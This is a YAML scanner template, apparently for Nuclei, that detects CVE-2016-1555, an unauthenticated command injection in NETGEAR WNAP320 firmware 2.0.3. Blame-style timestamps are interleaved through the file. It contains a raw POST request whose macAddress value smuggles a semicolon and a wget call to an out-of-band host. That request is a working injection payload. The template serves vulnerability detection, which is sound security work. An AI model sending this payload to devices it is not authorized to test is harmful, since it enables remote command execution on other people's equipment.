2022-04-07 13:53:15 +00:00
id : CVE-2016-1555
2022-04-22 10:38:41 +00:00
2022-04-07 13:53:15 +00:00
info :
2022-05-10 16:00:01 +00:00
name : NETGEAR WNAP320 Access Point Firmware - Remote Command Injection
2022-04-07 13:53:15 +00:00
author : gy741
severity : critical
description : NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
reference :
- https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE
- https://nvd.nist.gov/vuln/detail/CVE-2016-1555
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10.0
cve-id : CVE-2016-1555
cwe-id : CWE-77
tags : netgear,rce,oast,router
requests :
- raw :
- |
POST /boardDataWW.php HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : application/x-www-form-urlencoded
macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"
2022-05-10 16:00:01 +00:00
# Enhanced by mp on 2022/05/10